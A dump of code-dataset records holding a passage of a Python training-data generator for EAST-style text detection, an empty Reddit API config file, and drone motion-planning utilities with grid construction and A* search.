    elif line2[1] == 0:
        # line2 is vertical
        x = -line2[2]
        y = line1[0] * x + line1[2]
    else:
        # two sloped lines: solve k1*x + b1 = k2*x + b2
        k1, _, b1 = line1
        k2, _, b2 = line2
        x = -(b1-b2)/(k1-k2)
        y = k1*x + b1
    return np.array([x, y], dtype=np.float32)
def __line_verticle(self, line, point):
    """Return the line perpendicular to `line` that passes through `point`.

    Uses the same [a, b, c] representation as __fit_line
    ("verticle" kept for API compatibility; it means perpendicular).
    """
    if line[1] == 0:
        # `line` is vertical -> perpendicular is horizontal: y = point[1]
        verticle = [0, -1, point[1]]
    else:
        if line[0] == 0:
            # `line` is horizontal -> perpendicular is vertical: x = point[0]
            verticle = [1, 0, -point[0]]
        else:
            # perpendicular slope is -1/k; intercept chosen through `point`
            verticle = [-1./line[0], -1, point[1] - (-1/line[0] * point[0])]
    return verticle
def __rectangle_from_parallelogram(self, poly):
    """Create a rectangle from a parallelogram.

    Two opposite vertices are kept fixed (chosen from the angle at p0
    and which side is longer) and the other two are replaced by the
    feet of perpendiculars dropped onto the opposite sides.

    :param poly: parallelogram vertices p0..p3.
    :return: (4, 2) float32 rectangle vertices.
    """
    p0, p1, p2, p3 = poly
    # interior angle at p0, from the dot product of its two edges
    angle_p0 = np.arccos(np.dot(p1-p0, p3-p0)/(np.linalg.norm(p0-p1) * np.linalg.norm(p3-p0)))
    if angle_p0 < 0.5 * np.pi:
        if np.linalg.norm(p0 - p1) > np.linalg.norm(p0-p3):
            # keep p0 and p2
            ## new p3: foot of perpendicular from p0 onto edge p2-p3
            p2p3 = self.__fit_line([p2[0], p3[0]], [p2[1], p3[1]])
            p2p3_verticle = self.__line_verticle(p2p3, p0)
            new_p3 = self.__line_cross_point(p2p3, p2p3_verticle)
            ## new p1: foot of perpendicular from p2 onto edge p0-p1
            p0p1 = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
            p0p1_verticle = self.__line_verticle(p0p1, p2)
            new_p1 = self.__line_cross_point(p0p1, p0p1_verticle)
            return np.array([p0, new_p1, p2, new_p3], dtype=np.float32)
        else:
            # keep p0 and p2, projecting onto the other edge pair
            p1p2 = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
            p1p2_verticle = self.__line_verticle(p1p2, p0)
            new_p1 = self.__line_cross_point(p1p2, p1p2_verticle)
            p0p3 = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
            p0p3_verticle = self.__line_verticle(p0p3, p2)
            new_p3 = self.__line_cross_point(p0p3, p0p3_verticle)
            return np.array([p0, new_p1, p2, new_p3], dtype=np.float32)
    else:
        if np.linalg.norm(p0-p1) > np.linalg.norm(p0-p3):
            # keep p1 and p3
            ## new p2: foot of perpendicular from p1 onto edge p2-p3
            p2p3 = self.__fit_line([p2[0], p3[0]], [p2[1], p3[1]])
            p2p3_verticle = self.__line_verticle(p2p3, p1)
            new_p2 = self.__line_cross_point(p2p3, p2p3_verticle)
            ## new p0: foot of perpendicular from p3 onto edge p0-p1
            p0p1 = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
            p0p1_verticle = self.__line_verticle(p0p1, p3)
            new_p0 = self.__line_cross_point(p0p1, p0p1_verticle)
            return np.array([new_p0, p1, new_p2, p3], dtype=np.float32)
        else:
            # keep p1 and p3, projecting onto the other edge pair
            p0p3 = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
            p0p3_verticle = self.__line_verticle(p0p3, p1)
            new_p0 = self.__line_cross_point(p0p3, p0p3_verticle)
            p1p2 = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
            p1p2_verticle = self.__line_verticle(p1p2, p3)
            new_p2 = self.__line_cross_point(p1p2, p1p2_verticle)
            return np.array([new_p0, p1, new_p2, p3], dtype=np.float32)
def __sort_rectangle(self, poly):
    """Sort the four coordinates of the polygon; points in poly should be
    sorted clockwise.

    :return: (sorted_poly, rotate_angle) where p0 is the top-left-most
             vertex and rotate_angle is the box rotation in radians
             (0. for an axis-aligned box).
    """
    # First find the lowest point
    p_lowest = np.argmax(poly[:, 1])
    if np.count_nonzero(poly[:, 1] == poly[p_lowest, 1]) == 2:
        # if the bottom line is parallel to x-axis, then p0 must be the
        # upper-left corner (smallest x + y sum)
        p0_index = np.argmin(np.sum(poly, axis=1))
        p1_index = (p0_index + 1) % 4
        p2_index = (p0_index + 2) % 4
        p3_index = (p0_index + 3) % 4
        return poly[[p0_index, p1_index, p2_index, p3_index]], 0.
    else:
        # find the point that sits right to the lowest point
        p_lowest_right = (p_lowest - 1) % 4
        p_lowest_left = (p_lowest + 1) % 4
        angle = np.arctan(-(poly[p_lowest][1] - poly[p_lowest_right][1])/(poly[p_lowest][0] - poly[p_lowest_right][0]))
        # assert angle > 0
        if angle <= 0:
            print(angle, poly[p_lowest], poly[p_lowest_right])
        if angle/np.pi * 180 > 45:
            # the lowest point is p2
            p2_index = p_lowest
            p1_index = (p2_index - 1) % 4
            p0_index = (p2_index - 2) % 4
            p3_index = (p2_index + 1) % 4
            return poly[[p0_index, p1_index, p2_index, p3_index]], -(np.pi/2 - angle)
        else:
            # the lowest point is p3
            p3_index = p_lowest
            p0_index = (p3_index + 1) % 4
            p1_index = (p3_index + 2) % 4
            p2_index = (p3_index + 3) % 4
            return poly[[p0_index, p1_index, p2_index, p3_index]], angle
def __restore_rectangle_rbox(self, origin, geometry):
    """Restore rotated rectangles from RBOX geometry.

    :param origin: (N, 2) pixel positions inside text regions.
    :param geometry: (N, 5) per-pixel geometry: four border distances
                     followed by the rotation angle.
    :return: (N, 4, 2) rectangle vertices.

    Positive and negative angles are handled in two separate vectorized
    passes because the canonical (unrotated) rectangle is laid out
    differently in each case.
    """
    d = geometry[:, :4]
    angle = geometry[:, 4]
    # for angle >= 0
    origin_0 = origin[angle >= 0]
    d_0 = d[angle >= 0]
    angle_0 = angle[angle >= 0]
    if origin_0.shape[0] > 0:
        # 5 points per box: the 4 corners plus the pixel's own offset
        # (used below to translate the box back to image coordinates)
        p = np.array([np.zeros(d_0.shape[0]), -d_0[:, 0] - d_0[:, 2],
                      d_0[:, 1] + d_0[:, 3], -d_0[:, 0] - d_0[:, 2],
                      d_0[:, 1] + d_0[:, 3], np.zeros(d_0.shape[0]),
                      np.zeros(d_0.shape[0]), np.zeros(d_0.shape[0]),
                      d_0[:, 3], -d_0[:, 2]])
        p = p.transpose((1, 0)).reshape((-1, 5, 2))  # N*5*2
        # rotate all 5 points by angle_0
        rotate_matrix_x = np.array([np.cos(angle_0), np.sin(angle_0)]).transpose((1, 0))
        rotate_matrix_x = np.repeat(rotate_matrix_x, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))  # N*5*2
        rotate_matrix_y = np.array([-np.sin(angle_0), np.cos(angle_0)]).transpose((1, 0))
        rotate_matrix_y = np.repeat(rotate_matrix_y, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))
        p_rotate_x = np.sum(rotate_matrix_x * p, axis=2)[:, :, np.newaxis]  # N*5*1
        p_rotate_y = np.sum(rotate_matrix_y * p, axis=2)[:, :, np.newaxis]  # N*5*1
        p_rotate = np.concatenate([p_rotate_x, p_rotate_y], axis=2)  # N*5*2
        # translate so that the 5th (anchor) point lands on the pixel
        p3_in_origin = origin_0 - p_rotate[:, 4, :]
        new_p0 = p_rotate[:, 0, :] + p3_in_origin  # N*2
        new_p1 = p_rotate[:, 1, :] + p3_in_origin
        new_p2 = p_rotate[:, 2, :] + p3_in_origin
        new_p3 = p_rotate[:, 3, :] + p3_in_origin
        new_p_0 = np.concatenate([new_p0[:, np.newaxis, :], new_p1[:, np.newaxis, :],
                                  new_p2[:, np.newaxis, :], new_p3[:, np.newaxis, :]], axis=1)  # N*4*2
    else:
        new_p_0 = np.zeros((0, 4, 2))
    # for angle < 0 (mirrored canonical layout, rotation by -angle)
    origin_1 = origin[angle < 0]
    d_1 = d[angle < 0]
    angle_1 = angle[angle < 0]
    if origin_1.shape[0] > 0:
        p = np.array([-d_1[:, 1] - d_1[:, 3], -d_1[:, 0] - d_1[:, 2],
                      np.zeros(d_1.shape[0]), -d_1[:, 0] - d_1[:, 2],
                      np.zeros(d_1.shape[0]), np.zeros(d_1.shape[0]),
                      -d_1[:, 1] - d_1[:, 3], np.zeros(d_1.shape[0]),
                      -d_1[:, 1], -d_1[:, 2]])
        p = p.transpose((1, 0)).reshape((-1, 5, 2))  # N*5*2
        rotate_matrix_x = np.array([np.cos(-angle_1), -np.sin(-angle_1)]).transpose((1, 0))
        rotate_matrix_x = np.repeat(rotate_matrix_x, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))  # N*5*2
        rotate_matrix_y = np.array([np.sin(-angle_1), np.cos(-angle_1)]).transpose((1, 0))
        rotate_matrix_y = np.repeat(rotate_matrix_y, 5, axis=1).reshape(-1, 2, 5).transpose((0, 2, 1))
        p_rotate_x = np.sum(rotate_matrix_x * p, axis=2)[:, :, np.newaxis]  # N*5*1
        p_rotate_y = np.sum(rotate_matrix_y * p, axis=2)[:, :, np.newaxis]  # N*5*1
        p_rotate = np.concatenate([p_rotate_x, p_rotate_y], axis=2)  # N*5*2
        p3_in_origin = origin_1 - p_rotate[:, 4, :]
        new_p0 = p_rotate[:, 0, :] + p3_in_origin  # N*2
        new_p1 = p_rotate[:, 1, :] + p3_in_origin
        new_p2 = p_rotate[:, 2, :] + p3_in_origin
        new_p3 = p_rotate[:, 3, :] + p3_in_origin
        new_p_1 = np.concatenate([new_p0[:, np.newaxis, :], new_p1[:, np.newaxis, :],
                                  new_p2[:, np.newaxis, :], new_p3[:, np.newaxis, :]], axis=1)  # N*4*2
    else:
        new_p_1 = np.zeros((0, 4, 2))
    return np.concatenate([new_p_0, new_p_1])
def restore_rectangle(self, origin, geometry):
    """Public wrapper: restore rotated boxes from RBOX geometry maps."""
    return self.__restore_rectangle_rbox(origin, geometry)
#These Functions are used to Generate ROI params like out box,crop box & angles that we use to crop text from image
def __generate_roiRotatePara(self, box, angle, expand_w = 60):
    """Compute ROI-rotate parameters for one text rectangle.

    :param box: sorted rectangle vertices p0..p3 (from __sort_rectangle).
    :param angle: rotation angle returned by __sort_rectangle.
    :param expand_w: tolerance for boxes slightly outside the image;
                     boxes further out than this are rejected.
    :return: (outer bbox [x, y, w, h], crop rect [x, y, w, h] relative
             to the outer bbox, -angle), or None if the box is invalid.
    """
    p0_rect, p1_rect, p2_rect, p3_rect = box
    # center and side lengths of the rotated rectangle
    cxy = (p0_rect + p2_rect) / 2.
    size = np.array([np.linalg.norm(p0_rect - p1_rect), np.linalg.norm(p0_rect - p3_rect)])
    rrect = np.concatenate([cxy, size])  # [cx, cy, w, h]
    box=np.array(box)
    points=np.array(box, dtype=np.int32)
    # axis-aligned bounding box of the rotated rectangle
    xmin=np.min(points[:,0])
    xmax=np.max(points[:,0])
    ymin=np.min(points[:,1])
    ymax=np.max(points[:,1])
    bbox = np.array([xmin, ymin, xmax, ymax])
    if np.any(bbox < -expand_w):
        # too far outside the image to be usable
        return None
    rrect[:2] -= bbox[:2]       # center relative to the outer bbox
    rrect[:2] -= rrect[2:] / 2  # -> top-left corner of the crop
    rrect[2:] += rrect[:2]      # -> bottom-right corner
    bbox[2:] -= bbox[:2]        # outer bbox as [x, y, w, h]
    # clip the crop corners to the outer bbox
    rrect[::2] = np.clip(rrect[::2], 0, bbox[2])
    rrect[1::2] = np.clip(rrect[1::2], 0, bbox[3])
    rrect[2:] -= rrect[:2]      # back to [x, y, w, h]
    return bbox.astype(np.int32), rrect.astype(np.int32), - angle
def restore_roiRotatePara(self, box):
    """Public wrapper: sort a box and compute its ROI-rotate parameters."""
    rectange, rotate_angle = self.__sort_rectangle(box)
    return self.__generate_roiRotatePara(rectange, rotate_angle)
#This function is used to generate geo_map,score_map, training_mask,corp_box,out_box,angle that we use while training model
def __generate_rbox(self, im_size, polys, tags, num_classes):
    """Generate score_map and geo_map (plus ROI-rotate data) for an image.

    :param im_size: (h, w) of the image.
    :param polys: (N, 4, 2) validated text polygons.
    :param tags: per-polygon transcriptions (None marks unreadable text).
    :param num_classes: vocabulary size; num_classes - 2 is used as the
        padding label when no valid box exists.
    :return: (score_map, geo_map, training_mask,
              (outBoxs, cropBoxs, angles), text_tags, recg_masks)
    """
    h, w = im_size
    poly_mask = np.zeros((h, w), dtype=np.uint8)
    score_map = np.zeros((h, w), dtype=np.uint8)
    geo_map = np.zeros((h, w, 5), dtype=np.float32)
    outBoxs = []
    cropBoxs = []
    angles = []
    text_tags = []
    recg_masks = []
    # mask used during traning, to ignore some hard areas
    training_mask = np.ones((h, w), dtype=np.uint8)
    for poly_idx, poly_tag in enumerate(zip(polys, tags)):
        poly = poly_tag[0]
        tag = poly_tag[1]
        # r[i]: length of the shorter edge adjacent to vertex i
        r = [None, None, None, None]
        for i in range(4):
            r[i] = min(np.linalg.norm(poly[i] - poly[(i + 1) % 4]),
                       np.linalg.norm(poly[i] - poly[(i - 1) % 4]))
        # score map: fill the shrunk polygon
        shrinked_poly = self.__shrink_poly(poly.copy(), r).astype(np.int32)[np.newaxis, :, :]
        cv2.fillPoly(score_map, shrinked_poly, 1)
        # poly_mask records which polygon owns each pixel (1-based index)
        cv2.fillPoly(poly_mask, shrinked_poly, poly_idx + 1)
        # if geometry == 'RBOX':
        # generate a parallelogram for any combination of two vertices
        fitted_parallelograms = []
        for i in range(4):
            p0 = poly[i]
            p1 = poly[(i + 1) % 4]
            p2 = poly[(i + 2) % 4]
            p3 = poly[(i + 3) % 4]
            edge = self.__fit_line([p0[0], p1[0]], [p0[1], p1[1]])
            backward_edge = self.__fit_line([p0[0], p3[0]], [p0[1], p3[1]])
            forward_edge = self.__fit_line([p1[0], p2[0]], [p1[1], p2[1]])
            # parallel of `edge` through whichever of p2/p3 is farther
            if self.__point_dist_to_line(p0, p1, p2) > self.__point_dist_to_line(p0, p1, p3):
                # parallel lines through p2
                if edge[1] == 0:
                    edge_opposite = [1, 0, -p2[0]]
                else:
                    edge_opposite = [edge[0], -1, p2[1] - edge[0] * p2[0]]
            else:
                # after p3
                if edge[1] == 0:
                    edge_opposite = [1, 0, -p3[0]]
                else:
                    edge_opposite = [edge[0], -1, p3[1] - edge[0] * p3[0]]
            # move forward edge
            new_p0 = p0
            new_p1 = p1
            new_p2 = p2
            new_p3 = p3
            new_p2 = self.__line_cross_point(forward_edge, edge_opposite)
            if self.__point_dist_to_line(p1, new_p2, p0) > self.__point_dist_to_line(p1, new_p2, p3):
                # across p0
                if forward_edge[1] == 0:
                    forward_opposite = [1, 0, -p0[0]]
                else:
                    forward_opposite = [forward_edge[0], -1, p0[1] - forward_edge[0] * p0[0]]
            else:
                # across p3
                if forward_edge[1] == 0:
                    forward_opposite = [1, 0, -p3[0]]
                else:
                    forward_opposite = [forward_edge[0], -1, p3[1] - forward_edge[0] * p3[0]]
            new_p0 = self.__line_cross_point(forward_opposite, edge)
            new_p3 = self.__line_cross_point(forward_opposite, edge_opposite)
            fitted_parallelograms.append([new_p0, new_p1, new_p2, new_p3, new_p0])
            # or move backward edge
            new_p0 = p0
            new_p1 = p1
            new_p2 = p2
            new_p3 = p3
            new_p3 = self.__line_cross_point(backward_edge, edge_opposite)
            if self.__point_dist_to_line(p0, p3, p1) > self.__point_dist_to_line(p0, p3, p2):
                # across p1
                if backward_edge[1] == 0:
                    backward_opposite = [1, 0, -p1[0]]
                else:
                    backward_opposite = [backward_edge[0], -1, p1[1] - backward_edge[0] * p1[0]]
            else:
                # across p2
                if backward_edge[1] == 0:
                    backward_opposite = [1, 0, -p2[0]]
                else:
                    backward_opposite = [backward_edge[0], -1, p2[1] - backward_edge[0] * p2[0]]
            new_p1 = self.__line_cross_point(backward_opposite, edge)
            new_p2 = self.__line_cross_point(backward_opposite, edge_opposite)
            fitted_parallelograms.append([new_p0, new_p1, new_p2, new_p3, new_p0])
        # keep the smallest-area fitted parallelogram
        areas = [Polygon(t).area for t in fitted_parallelograms]
        parallelogram = np.array(fitted_parallelograms[np.argmin(areas)][:-1], dtype=np.float32)
        # sort the polygon so the min-coordinate-sum vertex comes first
        parallelogram_coord_sum = np.sum(parallelogram, axis=1)
        min_coord_idx = np.argmin(parallelogram_coord_sum)
        parallelogram = parallelogram[
            [min_coord_idx, (min_coord_idx + 1) % 4, (min_coord_idx + 2) % 4, (min_coord_idx + 3) % 4]]
        rectange = self.__rectangle_from_parallelogram(parallelogram)
        rectange, rotate_angle = self.__sort_rectangle(rectange)
        p0_rect, p1_rect, p2_rect, p3_rect = rectange
        # if the poly is too small, then ignore it during training
        poly_h = min(np.linalg.norm(p0_rect - p3_rect), np.linalg.norm(p1_rect - p2_rect))
        poly_w = min(np.linalg.norm(p0_rect - p1_rect), np.linalg.norm(p2_rect - p3_rect))
        invaild = (min(poly_h, poly_w) < 6) or tag is None or (True and poly_h > poly_w * 2)
        if invaild:
            # mask the whole polygon out of the loss
            cv2.fillPoly(training_mask, poly.astype(np.int32)[np.newaxis, :, :], 0)
        xy_in_poly = np.argwhere(poly_mask == (poly_idx + 1))
        if not invaild:
            roiRotatePara = self.__generate_roiRotatePara(rectange, rotate_angle)
            if roiRotatePara:
                outBox, cropBox, angle = roiRotatePara
                if min(cropBox[2:]) > 6:
                    # NOTE(review): this shadows the image-level w/h
                    # locals; appears harmless because they are not read
                    # again afterwards — confirm before refactoring.
                    w , h = cropBox[2:]
                    # width on the recognition feature map (height 32, stride 4)
                    textImgW = np.ceil(min(w / float(h) * 32, 256) / 4 /1)
                    if textImgW >= 2 * min(len(tag), 16):  # avoid CTC error
                        outBoxs.append(outBox)
                        cropBoxs.append(cropBox)
                        angles.append(angle)
                        text_tags.append(tag[:16])
                        recg_masks.append(1.)
        # per-pixel geometry: 4 border distances (+3 margin) and the angle
        for y, x in xy_in_poly:
            point = np.array([x, y], dtype=np.float32)
            # top
            geo_map[y, x, 0] = self.__point_dist_to_line(p0_rect, p1_rect, point) + 3
            # right
            geo_map[y, x, 1] = self.__point_dist_to_line(p1_rect, p2_rect, point) + 3
            # down
            geo_map[y, x, 2] = self.__point_dist_to_line(p2_rect, p3_rect, point) + 3
            # left
            geo_map[y, x, 3] = self.__point_dist_to_line(p3_rect, p0_rect, point) + 3
            # angle
            geo_map[y, x, 4] = rotate_angle
    if len(outBoxs) == 0:
        outBoxs.append([0, 0, 2 * 4, 2 * 4])  # keep extract From sharedConv feature map not zero
        cropBoxs.append([0, 0, 2 * 4, 2 * 4])
        angles.append(0.)
        text_tags.append([num_classes - 2])
        recg_masks.append(0.)
    outBoxs = np.array(outBoxs, np.int32)
    cropBoxs = np.array(cropBoxs, np.int32)
    angles = np.array(angles, np.float32)
    return score_map, geo_map, training_mask, (outBoxs, cropBoxs, angles), text_tags, recg_masks
def generate(self, input_size=512, batch_size=32, isSynth = True):
    """Yield (images, feature_maps) training batches indefinitely.

    :param input_size: side length the images are resized to.
    :param batch_size: number of images per yielded batch.
    :param isSynth: use the Synth dataset if True, otherwise ICDAR.
    :yields: (input_images, feature_maps) where feature_maps stacks
             score (1) + geometry (5) + training mask (1) channels.
    :raises Exception: if no images are found.
    """
    # Get image path list and class count for Synth or ICDAR
    image_list = []
    synth_dict = None
    num_classes = 0
    if isSynth:
        image_list = self.__loadSynthImages()
        synth_dict = self.__loadAllSynthGT()
        num_classes = len([text for texts in synth_dict['txt'] for text in texts])
    else:
        image_list = self.__loadICDARImages()
        num_classes = self.__textTagsCounts_ICDAR()
    if not image_list:
        raise Exception('No image available!!')
    index = np.arange(0, len(image_list))
    while True:
        np.random.shuffle(index)
        images = []
        image_fns = []
        score_maps = []
        geo_maps = []
        training_masks = []
        rboxes = []
        tags = []
        recg_masks = []
        for i in index:
            try:
                im_fn = image_list[i]
                im = cv2.imread(im_fn, cv2.IMREAD_UNCHANGED)
                if im is None:
                    continue
                h, w, _ = im.shape
                if isSynth:
                    text_polys, text_tags = self.__loadGT_Synth(im_fn, synth_dict)
                else:
                    text_polys, text_tags = self.__loadGT_ICDAR(im_fn)
                text_polys, text_tags = self.__check_and_validate_polys(text_polys, text_tags, (h, w))
                # resize the image to input size
                new_h, new_w, _ = im.shape
                resize_h = input_size
                resize_w = input_size
                # BUGFIX: honour input_size instead of hard-coded (512, 512)
                im = cv2.resize(im, dsize=(resize_w, resize_h), interpolation=cv2.INTER_AREA)
                # scale the polygons by the same ratios
                resize_ratio_3_x = resize_w / float(new_w)
                resize_ratio_3_y = resize_h / float(new_h)
                text_polys[:, :, 0] *= resize_ratio_3_x
                text_polys[:, :, 1] *= resize_ratio_3_y
                new_h, new_w, _ = im.shape
                score_map, geo_map, training_mask, rbox, text_tags, recg_mask = self.__generate_rbox((new_h, new_w), text_polys, text_tags, num_classes)
                images.append(im)
                image_fns.append(im_fn)
                score_maps.append(score_map[::, ::, np.newaxis].astype(np.float32))
                geo_maps.append(geo_map[::, ::, :].astype(np.float32))
                training_masks.append(training_mask[::, ::, np.newaxis].astype(np.float32))
                rboxes.append(rbox)
                tags.append(text_tags)
                recg_masks.append(recg_mask)
                if len(images) == batch_size:
                    input_images = np.array(images)
                    # stack score + geometry + mask along the channel axis
                    feature_maps = np.concatenate([np.array(score_maps), np.array(geo_maps), np.array(training_masks)], axis=3)
                    yield (input_images, feature_maps)
                    images = []
                    image_fns = []
                    score_maps = []
                    geo_maps = []
                    training_masks = []
                    rboxes = []
                    tags = []
                    recg_masks = []
            except Exception as e:
                # best effort: report and skip unreadable / malformed samples
                print(image_list[i])
                traceback.print_exc()
                continue
def generateRecogTextSynth(self, input_size = 512):
    """Crop word images from Synth data for the recognition branch.

    Writes each cropped word to 'synth_word_texts/word_<k>.png' and
    returns a DataFrame with columns 'path' and 'word'.

    :param input_size: side length each source image is resized to.
    """
    # Load image paths and gt dict
    image_list = self.__loadSynthImages()
    synth_dict = self.__loadAllSynthGT()
    num_classes = len([text for texts in synth_dict['txt'] for text in texts])
    # sample 5k images out of 10k
    image_list = random.sample(image_list, 5000)
    index = np.arange(0, len(image_list))
    np.random.shuffle(index)
    c = 0  # running counter for output file names
    paths = []
    words = []
    if not os.path.exists('synth_word_texts'):
        os.mkdir('synth_word_texts')
    for i in index:
        try:
            im_fn = image_list[i]
            im = cv2.imread(im_fn, cv2.IMREAD_UNCHANGED)
            if im is None:
                continue
            h, w, _ = im.shape
            text_polys, text_tags = self.__loadGT_Synth(im_fn, synth_dict)
            text_polys, text_tags = self.__check_and_validate_polys(text_polys, text_tags, (h, w))
            # resize the image to input size
            new_h, new_w, _ = im.shape
            resize_h = input_size
            resize_w = input_size
            # BUGFIX: honour input_size instead of hard-coded (512, 512)
            im = cv2.resize(im, dsize=(resize_w, resize_h), interpolation=cv2.INTER_AREA)
            resize_ratio_3_x = resize_w / float(new_w)
            resize_ratio_3_y = resize_h / float(new_h)
            text_polys[:, :, 0] *= resize_ratio_3_x
            text_polys[:, :, 1] *= resize_ratio_3_y
            new_h, new_w, _ = im.shape
            score_map, geo_map, training_mask, rbox, text_tags, recg_mask = self.__generate_rbox((new_h, new_w), text_polys, text_tags, num_classes)
            outbox, cropbox, angle = rbox
            # BUGFIX: the inner loop previously reused `i`, clobbering the
            # outer image index, so the except clause printed the wrong
            # file name on failure.
            for j in range(len(outbox)):
                if recg_mask[j] != 0:
                    out = outbox[j]
                    crop = cropbox[j]
                    # only crops lying fully inside the resized image
                    if (im.shape[0] > out[3] + out[1] and im.shape[1] > out[2] + out[0]
                            and out[2] >= 0 and out[3] >= 0 and out[1] >= 0 and out[0] >= 0):
                        ang = angle[j]
                        img = tf.image.crop_to_bounding_box(im, out[1], out[0], out[3], out[2])
                        img = tf.keras.preprocessing.image.random_rotation(img, ang * 180 / np.pi,)
                        if not isinstance(img, np.ndarray):
                            img = img.numpy()
                        img = cv2.resize(img, (128, 64), interpolation=cv2.INTER_AREA)
                        img = cv2.detailEnhance(img)
                        c += 1
                        cv2.imwrite('synth_word_texts/word_' + str(c) + '.png', img)
                        paths.append('synth_word_texts/word_' + str(c) + '.png')
                        words.append(text_tags[j])
        except Exception as e:
            # best effort: report and continue with the next image
            print(image_list[i])
            import traceback
            traceback.print_exc()
            continue
    data = pd.DataFrame({"path": paths, "word": words})
    return data
| [
"noreply@github.com"
] | Amlan-Gopal.noreply@github.com |
04d47422d6a76801d62c26410a9a43db11a6255f | 2a8891bbfbd6fa9fa8569adac51194bfaef97f5d | /config.py | 4f2085183a3645a4dd60ba56ea5198de402ea5b9 | [] | no_license | artbn/RC | a39db55b62387704954998c22be5e625501ce84d | a6d796ce84a02aa219e6e22a94b6f8db85a817ce | refs/heads/master | 2020-03-23T20:44:13.482299 | 2018-07-23T19:27:05 | 2018-07-23T19:27:05 | 142,059,485 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | username = ""
# Reddit API credentials for the /r/counting Hall-of-Counters script.
# Fill these in locally; never commit real secrets to version control.
password = ""
client_id = ''
client_secret = ''
user_agent = 'Calculates HoC for /r/counting'
"artbn@AMA.localdomain"
] | artbn@AMA.localdomain |
2db8ab80ed72844b6bef78bae4348bce7f1c7503 | bbbd7ffcc4b55bed62a96780db8edeca487ba08b | /FCND-Motion-Planning/planning_utils.py | 861933e06cc124770a8870b2aaccfb9797d9bb2f | [] | no_license | spowers42/flying | 9560ce1fda6533c1457267912df5918265add523 | af124cdd8f02b2793287b4751a869d945f850381 | refs/heads/master | 2020-03-17T23:53:43.825796 | 2018-05-20T17:06:32 | 2018-05-20T17:06:32 | 134,065,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,407 | py | from enum import Enum
from queue import PriorityQueue
import numpy as np
def create_grid(data, drone_altitude, safety_distance):
    """
    Build a 2-D occupancy grid from obstacle data.

    data rows are [north, east, alt, d_north, d_east, d_alt] obstacle
    centers and half-extents.  Cells covered by an obstacle that reaches
    above (drone_altitude - safety_distance) are marked 1; safety_distance
    also inflates each obstacle horizontally.

    Returns (grid, north_min, east_min) so grid indices can be mapped
    back to world coordinates.
    """
    # World extent of the map, rounded outwards to whole units.
    north_min = np.floor(np.min(data[:, 0] - data[:, 3]))
    north_max = np.ceil(np.max(data[:, 0] + data[:, 3]))
    east_min = np.floor(np.min(data[:, 1] - data[:, 4]))
    east_max = np.ceil(np.max(data[:, 1] + data[:, 4]))

    north_size = int(np.ceil(north_max - north_min))
    east_size = int(np.ceil(east_max - east_min))
    grid = np.zeros((north_size, east_size))

    for north, east, alt, d_north, d_east, d_alt in data:
        # Obstacles entirely below the (safety-adjusted) flight altitude
        # do not block the drone.
        if alt + d_alt + safety_distance <= drone_altitude:
            continue
        n_lo = int(np.clip(north - d_north - safety_distance - north_min, 0, north_size - 1))
        n_hi = int(np.clip(north + d_north + safety_distance - north_min, 0, north_size - 1))
        e_lo = int(np.clip(east - d_east - safety_distance - east_min, 0, east_size - 1))
        e_hi = int(np.clip(east + d_east + safety_distance - east_min, 0, east_size - 1))
        grid[n_lo:n_hi + 1, e_lo:e_hi + 1] = 1

    return grid, int(north_min), int(east_min)
# Assume all actions cost the same.
class Action(Enum):
    """
    An action is represented by a 3 element tuple.

    The first 2 values are the delta of the action relative
    to the current grid position. The third and final value
    is the cost of performing the action.
    """

    WEST = (0, -1, 1)
    EAST = (0, 1, 1)
    NORTH = (-1, 0, 1)
    SOUTH = (1, 0, 1)

    @property
    def cost(self):
        # third tuple element: cost of taking this step
        return self.value[2]

    @property
    def delta(self):
        # (d_north, d_east) grid offset of this action
        return (self.value[0], self.value[1])
def valid_actions(grid, current_node):
    """
    Return the actions from current_node that stay on the grid and
    do not land on an obstacle cell (grid value 1).
    """
    n, m = grid.shape[0] - 1, grid.shape[1] - 1
    x, y = current_node
    feasible = []
    # Iterating Action in definition order preserves the same result
    # ordering as filtering a full list(Action).
    for action in Action:
        dx, dy = action.delta
        nx, ny = x + dx, y + dy
        if 0 <= nx <= n and 0 <= ny <= m and grid[nx, ny] == 0:
            feasible.append(action)
    return feasible
def a_star(grid, h, start, goal):
    """
    A* search over a 2-D occupancy grid.

    :param grid: 2-D array with 0 = free, 1 = obstacle.
    :param h: heuristic function h(node, goal) -> estimated cost.
    :param start: (row, col) start node.
    :param goal: (row, col) goal node.
    :return: (path, path_cost); path is the start-to-goal node list,
             empty if no route exists.
    """
    path = []
    path_cost = 0
    queue = PriorityQueue()
    queue.put((0, start))
    # BUGFIX: `set(start)` built a set of the start tuple's *elements*
    # (e.g. {0} for (0, 0)), so the start node itself was never marked
    # visited and nodes could be queued redundantly.
    visited = {start}
    branch = {}  # node -> (cost-so-far, parent, action taken)
    found = False

    while not queue.empty():
        item = queue.get()
        current_node = item[1]
        if current_node == start:
            current_cost = 0.0
        else:
            current_cost = branch[current_node][0]

        if current_node == goal:
            print('Found a path.')
            found = True
            break
        for action in valid_actions(grid, current_node):
            # get the tuple representation
            da = action.delta
            next_node = (current_node[0] + da[0], current_node[1] + da[1])
            branch_cost = current_cost + action.cost
            queue_cost = branch_cost + h(next_node, goal)
            if next_node not in visited:
                visited.add(next_node)
                branch[next_node] = (branch_cost, current_node, action)
                queue.put((queue_cost, next_node))

    if found:
        # retrace steps from goal back to start via the parent links
        n = goal
        path_cost = branch[n][0]
        path.append(goal)
        while branch[n][1] != start:
            path.append(branch[n][1])
            n = branch[n][1]
        path.append(branch[n][1])
    else:
        print('**********************')
        print('Failed to find a path!')
        print('**********************')
    return path[::-1], path_cost
def heuristic(position, goal_position):
    """Euclidean distance between position and goal_position."""
    difference = np.array(position) - np.array(goal_position)
    return np.linalg.norm(difference)
| [
"spowers.42@gmail.com"
] | spowers.42@gmail.com |
